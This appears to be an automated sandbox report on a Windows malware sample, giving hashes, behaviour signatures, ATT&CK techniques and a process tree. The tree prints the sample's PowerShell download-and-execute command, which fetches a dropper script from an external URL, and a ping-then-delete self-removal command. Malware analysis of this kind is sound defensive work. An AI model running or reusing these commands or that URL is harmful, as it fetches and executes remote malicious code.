51fb189db1820ef138dd102477132b96ef5875a98d0f03be54e6e4e30458bc2b

Analysis

max time kernel
33s
max time network
34s
platform
windows7_x64
resource
win7-20230220-en
resource tags

arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system
submitted
02-06-2023 01:23

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

ada19cb4ac105d3455eb0c2f84fcc2d9cf4350e78e149a62304c90f978e72b7f.exe
Size

253KB
MD5

3661cbaa14b2974e5f1c228da71b3375
SHA1

2802749a624d8b66786988805aafabdc8b3c741e
SHA256

ada19cb4ac105d3455eb0c2f84fcc2d9cf4350e78e149a62304c90f978e72b7f
SHA512

a35ce1d9dbfa50bc40de1effea0aaa69a45613c0545b918dd3f710106d917764940241cbad829738519c78167db5f4705b8b682acf698d60c3d54329b0e39099
SSDEEP

3072:/jw74LtbRIpVtSxq3hJSaj0CqWuvSNImaZhljVLl7r8qi41j2m2FtHJjgBvFGhC4:M6hJVL5nt2FvUJFGhCWUyAOkgqk7

Score

10^/10

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://transparenciacanaa.com.br/cidadejunina/js/vendor/debug2.ps1

Signatures

Blocklisted process makes network request 2 IoCs

flow	pid	Process
7	1876	powershell.exe
9	1876	powershell.exe

Deletes itself 1 IoCs

pid	Process
1792	cmd.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
1964	PING.EXE

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
1876	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	1876	powershell.exe

Suspicious use of WriteProcessMemory 15 IoCs

description	pid	Process	procid_target
PID 832 wrote to memory of 1880	832	ada19cb4ac105d3455eb0c2f84fcc2d9cf4350e78e149a62304c90f978e72b7f.exe	28
PID 832 wrote to memory of 1880	832	ada19cb4ac105d3455eb0c2f84fcc2d9cf4350e78e149a62304c90f978e72b7f.exe	28
PID 832 wrote to memory of 1880	832	ada19cb4ac105d3455eb0c2f84fcc2d9cf4350e78e149a62304c90f978e72b7f.exe	28
PID 832 wrote to memory of 1880	832	ada19cb4ac105d3455eb0c2f84fcc2d9cf4350e78e149a62304c90f978e72b7f.exe	28
PID 1880 wrote to memory of 1876	1880	cmd.exe	30
PID 1880 wrote to memory of 1876	1880	cmd.exe	30
PID 1880 wrote to memory of 1876	1880	cmd.exe	30
PID 832 wrote to memory of 1792	832	ada19cb4ac105d3455eb0c2f84fcc2d9cf4350e78e149a62304c90f978e72b7f.exe	35
PID 832 wrote to memory of 1792	832	ada19cb4ac105d3455eb0c2f84fcc2d9cf4350e78e149a62304c90f978e72b7f.exe	35
PID 832 wrote to memory of 1792	832	ada19cb4ac105d3455eb0c2f84fcc2d9cf4350e78e149a62304c90f978e72b7f.exe	35
PID 832 wrote to memory of 1792	832	ada19cb4ac105d3455eb0c2f84fcc2d9cf4350e78e149a62304c90f978e72b7f.exe	35
PID 1792 wrote to memory of 1964	1792	cmd.exe	37
PID 1792 wrote to memory of 1964	1792	cmd.exe	37
PID 1792 wrote to memory of 1964	1792	cmd.exe	37
PID 1792 wrote to memory of 1964	1792	cmd.exe	37

C:\Users\Admin\AppData\Local\Temp\ada19cb4ac105d3455eb0c2f84fcc2d9cf4350e78e149a62304c90f978e72b7f.exe
"C:\Users\Admin\AppData\Local\Temp\ada19cb4ac105d3455eb0c2f84fcc2d9cf4350e78e149a62304c90f978e72b7f.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:832
- C:\Windows\system32\cmd.exe
  "C:\Windows\sysnative\cmd.exe" /c "powershell -command IEX(New-Object Net.Webclient).DownloadString('https://transparenciacanaa.com.br/cidadejunina/js/vendor/debug2.ps1')"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1880
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -command IEX(New-Object Net.Webclient).DownloadString('https://transparenciacanaa.com.br/cidadejunina/js/vendor/debug2.ps1')
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1876
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\ada19cb4ac105d3455eb0c2f84fcc2d9cf4350e78e149a62304c90f978e72b7f.exe" >> NUL
  2⤵
  - Deletes itself
  - Suspicious use of WriteProcessMemory
  PID:1792
- - C:\Windows\SysWOW64\PING.EXE
    ping 127.0.0.1
    3⤵
    - Runs ping.exe
    PID:1964

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/1876-58-0x000000001B320000-0x000000001B602000-memory.dmp

Filesize
2.9MB

Download
memory/1876-59-0x0000000001F40000-0x0000000001F48000-memory.dmp

Filesize
32KB

Download
memory/1876-60-0x0000000002890000-0x0000000002910000-memory.dmp

Filesize
512KB

Download
memory/1876-61-0x0000000002890000-0x0000000002910000-memory.dmp

Filesize
512KB

Download
memory/1876-62-0x0000000002890000-0x0000000002910000-memory.dmp

Filesize
512KB

Download
memory/1876-63-0x0000000002890000-0x0000000002910000-memory.dmp

Filesize
512KB

Download